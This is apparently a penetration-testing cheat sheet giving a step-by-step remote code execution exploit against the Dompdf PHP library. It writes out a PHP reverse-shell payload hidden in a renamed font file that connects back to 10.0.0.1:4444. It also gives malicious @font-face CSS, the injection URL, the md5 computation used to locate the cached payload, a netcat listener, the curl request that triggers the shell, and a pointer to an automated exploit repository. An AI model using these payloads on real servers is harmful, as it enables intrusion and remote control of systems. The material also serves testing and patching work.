# Dompdf RCE

Dompdf is an HTML to PDF converter for PHP. It may be vulnerable to remote code execution or SSRF.

### Exploitation <a href="#exploitation" id="exploitation"></a>

#### 1. Create Malicious Font <a href="#id-1-create-malicious-font" id="id-1-create-malicious-font"></a>

First off, we need to prepare the malicious **`.ttf`** file.\
Here, we find the **`.ttf`** file in our local system and copy it to the current directory and change the extention **`ttf`** to **`php`** because we want to execute PHP script.

```shellscript
find / -name "*.ttf" 2>/dev/null
cp /path/to/example.ttf ./evil.php
```

Then add the PHP payload at the end of the file.

```shellscript
...
<?php system("bash -c 'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'"); ?>
```

#### 2. Create Malicious CSS <a href="#id-2-create-malicious-css" id="id-2-create-malicious-css"></a>

Next we create a malicious CSS that load the above **“evil.php”**.

```shellscript
@font-face {
  font-family: 'evil';
  src: url('http://10.0.0.1:8000/evil.php');
  font-weight: 'normal';
  font-style: 'normal';
}
```

#### 3. Host PHP & CSS <a href="#id-3-host-php-css" id="id-3-host-php-css"></a>

Now we have the two files in current working directory.

```shellscript
ls

evil.css evil.php
```

Start web server to host them.

```shellscript
python3 -m http.server 8000
```

#### 4. Send Request <a href="#id-4-send-request" id="id-4-send-request"></a>

In target website, send request to upload the HTML as below.

```shellscript
https://example.com/?pdf&title=<link rel=stylesheet href='http://10.0.0.1:8000/evil.css'>
```

Our “evil.php” is uploaded to **`/dompdf/lib/fonts/<font_name>_<font_weight/style>_<md5>.php`**.\
For example, **`/dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php`**.

To get the md5 hash, we can calculate it by the following command.

```shellscript
echo -n http://10.0.0.1:8000/evil.php | md5sum

2cddaeb743b6aeb5638ac0ac93c4c9f6
```

Also we can use Python hashlib module.

```shellscript
python3

>>> import hashlib
>>> hashlib.md5("http://10.0.0.1:8000/evil.php".encode("UTF-8")).hexdigest()
>>> 2cddaeb743b6aeb5638ac0ac93c4c9f6
```

#### 5. Execute Malicious PHP via Cached File <a href="#id-5-execute-malicious-php-via-cached-file" id="id-5-execute-malicious-php-via-cached-file"></a>

Finally we get the cached file path as above so we can get the cached PHP file that executes malicious code.\
For reverse shell, we need to start a listener in local.

```shellscript
nc -lvnp 4444
```

Now access to the cached PHP file.

```shellscript
curl https://example.com/dompdf/lib/fonts/evil_normal_2cddaeb743b6aeb5638ac0ac93c4c9f6.php
```

We get a shell in local terminal.

### Exploitation (Automatically) <a href="#exploitation-automatically" id="exploitation-automatically"></a>

Also we can exploit with [the repository](https://github.com/positive-security/dompdf-rce).

```shellscript
git clone https://github.com/positive-security/dompdf-rce.git
cd dompdf-rce/exploit
```

Modify CSS and PHP depending on your situation. Please see the previous **"Exploitation"** section for the details of each file.

```shellscript
php -S 0.0.0.0:9001
```

Then send request.

```shellscript
https://example.com/?pdf&title=<link rel=stylesheet href='http://10.0.0.1:9001/exploit.css'>
```

### References <a href="#references" id="references"></a>

* [dompdf](https://github.com/dompdf/dompdf)
* [Optiv](https://www.optiv.com/insights/source-zero/blog/exploiting-rce-vulnerability-dompdf)